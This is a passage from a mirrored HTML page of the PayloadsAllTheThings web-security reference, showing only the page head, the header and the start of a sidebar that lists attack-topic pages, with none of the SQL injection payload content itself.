weyne/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/weyne85/PayloadsAllTheThings.git synced 2025-10-29 16:57:02 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
76f281cc930ba9049164f4e57bc50400bb693af1
PayloadsAllTheThings/SQL Injection/index.html

6917 lines
197 KiB
HTML
Raw Blame History

This file contains invisible Unicode characters
This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
<!doctype html>
<html lang="en" class="no-js">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security">
<link rel="canonical" href="https://swisskyrepo.github.io/PayloadsAllTheThings/SQL%20Injection/">
<link rel="prev" href="../SAML%20Injection/">
<link rel="next" href="BigQuery%20Injection/">
<link rel="icon" href="../assets/images/favicon.png">
<meta name="generator" content="mkdocs-1.5.3, mkdocs-material-9.5.15">
<title>SQL Injection - Payloads All The Things</title>
<link rel="stylesheet" href="../assets/stylesheets/main.7e359304.min.css">
<link rel="stylesheet" href="../assets/stylesheets/palette.06af60db.min.css">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
<style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
<link rel="stylesheet" href="../custom.css">
<script>__md_scope=new URL("..",location),__md_hash=e=>[...e].reduce((e,_)=>(e<<5)-e+_.charCodeAt(0),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
</head>
<body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo">
<input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
<input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
<label class="md-overlay" for="__drawer"></label>
<div data-md-component="skip">
<a href="#sql-injection" class="md-skip">
Skip to content
</a>
</div>
<div data-md-component="announce">
</div>
<header class="md-header md-header--shadow" data-md-component="header">
<nav class="md-header__inner md-grid" aria-label="Header">
<a href=".." title="Payloads All The Things" class="md-header__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54Z"/></svg>
</a>
<label class="md-header__button md-icon" for="__drawer">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2Z"/></svg>
</label>
<div class="md-header__title" data-md-component="header-title">
<div class="md-header__ellipsis">
<div class="md-header__topic">
<span class="md-ellipsis">
Payloads All The Things
</span>
</div>
<div class="md-header__topic" data-md-component="header-topic">
<span class="md-ellipsis">
SQL Injection
</span>
</div>
</div>
</div>
<form class="md-header__option" data-md-component="palette">
<input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to dark mode" type="radio" name="__palette" id="__palette_0">
<label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12 20 8.69Z"/></svg>
</label>
<input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to light mode" type="radio" name="__palette" id="__palette_1">
<label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12c0-2.42-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12 20 8.69Z"/></svg>
</label>
</form>
<script>var media,input,key,value,palette=__md_get("__palette");if(palette&&palette.color){"(prefers-color-scheme)"===palette.color.media&&(media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']"),palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent"));for([key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
<label class="md-header__button md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5Z"/></svg>
</label>
<div class="md-search" data-md-component="search" role="dialog">
<label class="md-search__overlay" for="__search"></label>
<div class="md-search__inner" role="search">
<form class="md-search__form" name="search">
<input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
<label class="md-search__icon md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5Z"/></svg>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12Z"/></svg>
</label>
<nav class="md-search__options" aria-label="Search">
<button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41Z"/></svg>
</button>
</nav>
</form>
<div class="md-search__output">
<div class="md-search__scrollwrap" data-md-scrollfix>
<div class="md-search-result" data-md-component="search-result">
<div class="md-search-result__meta">
Initializing search
</div>
<ol class="md-search-result__list" role="presentation"></ol>
</div>
</div>
</div>
</div>
</div>
<div class="md-header__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.5.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2023 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6zm-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3zm44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9zM244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8zM97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1zm-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7zm32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1zm-11.4-14.7c-1.6 1-1.6 3.6 0 5.9 1.6 2.3 4.3 3.3 5.6 2.3 1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2z"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
</nav>
</header>
<div class="md-container" data-md-component="container">
<main class="md-main" data-md-component="main">
<div class="md-main__inner md-grid">
<div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
<label class="md-nav__title" for="__drawer">
<a href=".." title="Payloads All The Things" class="md-nav__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54Z"/></svg>
</a>
Payloads All The Things
</label>
<div class="md-nav__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.5.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2023 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6zm-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3zm44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9zM244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8zM97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1zm-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7zm32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1zm-11.4-14.7c-1.6 1-1.6 3.6 0 5.9 1.6 2.3 4.3 3.3 5.6 2.3 1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2z"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href=".." class="md-nav__link">
<span class="md-ellipsis">
Payloads All The Things
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CONTRIBUTING/" class="md-nav__link">
<span class="md-ellipsis">
CONTRIBUTING
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" >
<label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
<span class="md-ellipsis">
API Key Leaks
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_3">
<span class="md-nav__icon md-icon"></span>
API Key Leaks
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../API%20Key%20Leaks/" class="md-nav__link">
<span class="md-ellipsis">
API Key Leaks
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
<label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
<span class="md-ellipsis">
AWS Amazon Bucket S3
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4">
<span class="md-nav__icon md-icon"></span>
AWS Amazon Bucket S3
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../AWS%20Amazon%20Bucket%20S3/" class="md-nav__link">
<span class="md-ellipsis">
Amazon Bucket S3 AWS
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5" >
<label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="0">
<span class="md-ellipsis">
Account Takeover
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_5">
<span class="md-nav__icon md-icon"></span>
Account Takeover
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Account%20Takeover/" class="md-nav__link">
<span class="md-ellipsis">
Account Takeover
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_6" >
<label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="0">
<span class="md-ellipsis">
Argument Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_6">
<span class="md-nav__icon md-icon"></span>
Argument Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Argument%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Argument Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_7" >
<label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="0">
<span class="md-ellipsis">
Business Logic Errors
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_7">
<span class="md-nav__icon md-icon"></span>
Business Logic Errors
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Business%20Logic%20Errors/" class="md-nav__link">
<span class="md-ellipsis">
Business Logic Errors
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_8" >
<label class="md-nav__link" for="__nav_8" id="__nav_8_label" tabindex="0">
<span class="md-ellipsis">
CICD
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_8">
<span class="md-nav__icon md-icon"></span>
CICD
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CICD/" class="md-nav__link">
<span class="md-ellipsis">
CI/CD attacks
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_9" >
<label class="md-nav__link" for="__nav_9" id="__nav_9_label" tabindex="0">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_9">
<span class="md-nav__icon md-icon"></span>
CORS Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CORS%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10" >
<label class="md-nav__link" for="__nav_10" id="__nav_10_label" tabindex="0">
<span class="md-ellipsis">
CRLF Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_10_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10">
<span class="md-nav__icon md-icon"></span>
CRLF Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CRLF%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Carriage Return Line Feed
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_11" >
<label class="md-nav__link" for="__nav_11" id="__nav_11_label" tabindex="0">
<span class="md-ellipsis">
CSRF Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_11_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_11">
<span class="md-nav__icon md-icon"></span>
CSRF Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CSRF%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cross-Site Request Forgery
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_12" >
<label class="md-nav__link" for="__nav_12" id="__nav_12_label" tabindex="0">
<span class="md-ellipsis">
CSV Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_12_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_12">
<span class="md-nav__icon md-icon"></span>
CSV Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CSV%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
CSV Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_13" >
<label class="md-nav__link" for="__nav_13" id="__nav_13_label" tabindex="0">
<span class="md-ellipsis">
CVE Exploits
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_13_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_13">
<span class="md-nav__icon md-icon"></span>
CVE Exploits
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CVE%20Exploits/" class="md-nav__link">
<span class="md-ellipsis">
Common Vulnerabilities and Exposures
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CVE%20Exploits/Log4Shell/" class="md-nav__link">
<span class="md-ellipsis">
CVE-2021-44228 Log4Shell
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_14" >
<label class="md-nav__link" for="__nav_14" id="__nav_14_label" tabindex="0">
<span class="md-ellipsis">
Clickjacking
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_14_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_14">
<span class="md-nav__icon md-icon"></span>
Clickjacking
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Clickjacking/" class="md-nav__link">
<span class="md-ellipsis">
Clickjacking: Web Application Security Vulnerability
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_15" >
<label class="md-nav__link" for="__nav_15" id="__nav_15_label" tabindex="0">
<span class="md-ellipsis">
Command Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_15_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_15">
<span class="md-nav__icon md-icon"></span>
Command Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Command%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Command Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_16" >
<label class="md-nav__link" for="__nav_16" id="__nav_16_label" tabindex="0">
<span class="md-ellipsis">
DNS Rebinding
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_16_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_16">
<span class="md-nav__icon md-icon"></span>
DNS Rebinding
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../DNS%20Rebinding/" class="md-nav__link">
<span class="md-ellipsis">
DNS Rebinding
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_17" >
<label class="md-nav__link" for="__nav_17" id="__nav_17_label" tabindex="0">
<span class="md-ellipsis">
Dependency Confusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_17_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_17">
<span class="md-nav__icon md-icon"></span>
Dependency Confusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Dependency%20Confusion/" class="md-nav__link">
<span class="md-ellipsis">
Dependency Confusion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_18" >
<label class="md-nav__link" for="__nav_18" id="__nav_18_label" tabindex="0">
<span class="md-ellipsis">
Directory Traversal
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_18_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_18">
<span class="md-nav__icon md-icon"></span>
Directory Traversal
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Directory%20Traversal/" class="md-nav__link">
<span class="md-ellipsis">
Directory Traversal
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_19" >
<label class="md-nav__link" for="__nav_19" id="__nav_19_label" tabindex="0">
<span class="md-ellipsis">
Dom Clobbering
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_19_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_19">
<span class="md-nav__icon md-icon"></span>
Dom Clobbering
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Dom%20Clobbering/" class="md-nav__link">
<span class="md-ellipsis">
Dom Clobbering
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_20" >
<label class="md-nav__link" for="__nav_20" id="__nav_20_label" tabindex="0">
<span class="md-ellipsis">
File Inclusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_20_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_20">
<span class="md-nav__icon md-icon"></span>
File Inclusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../File%20Inclusion/" class="md-nav__link">
<span class="md-ellipsis">
File Inclusion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_21" >
<label class="md-nav__link" for="__nav_21" id="__nav_21_label" tabindex="0">
<span class="md-ellipsis">
Google Web Toolkit
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_21_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_21">
<span class="md-nav__icon md-icon"></span>
Google Web Toolkit
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Google%20Web%20Toolkit/" class="md-nav__link">
<span class="md-ellipsis">
Google Web Toolkit
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_22" >
<label class="md-nav__link" for="__nav_22" id="__nav_22_label" tabindex="0">
<span class="md-ellipsis">
GraphQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_22_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_22">
<span class="md-nav__icon md-icon"></span>
GraphQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../GraphQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
GraphQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_23" >
<label class="md-nav__link" for="__nav_23" id="__nav_23_label" tabindex="0">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_23_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_23">
<span class="md-nav__icon md-icon"></span>
HTTP Parameter Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../HTTP%20Parameter%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_24" >
